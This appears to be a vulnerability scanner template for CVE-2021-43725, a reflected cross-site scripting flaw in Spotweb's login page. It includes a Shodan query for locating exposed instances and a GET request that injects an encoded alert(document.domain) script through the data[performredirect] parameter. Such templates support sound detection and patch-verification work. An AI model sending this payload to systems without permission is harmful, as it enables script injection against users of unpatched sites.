id: CVE-2021-43725 info: name: Spotweb <= 1.5.1 - Cross Site Scripting (Reflected) author: theamanrawat severity: medium description: | There is a Cross Site Scripting (XSS) vulnerability in SpotPage_login.php of Spotweb 1.5.1 and below, which allows remote attackers to inject arbitrary web script or HTML via the data[performredirect] parameter. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ - https://github.com/spotweb/spotweb/issues/718 - https://nvd.nist.gov/vuln/detail/CVE-2021-43725 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-43725 cwe-id: CWE-79 metadata: max-request: 1 verified: "true" shodan-query: title:"SpotWeb - overview" tags: cve,cve2021,xss,spotweb,unauth http: - method: GET path: - "{{BaseURL}}/?data[performredirect]=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&page=login" matchers-condition: and matchers: - type: word part: body words: - 'value="">' - 'name="data[performredirect]' condition: and - type: word part: header words: - "text/html" - type: status status: - 200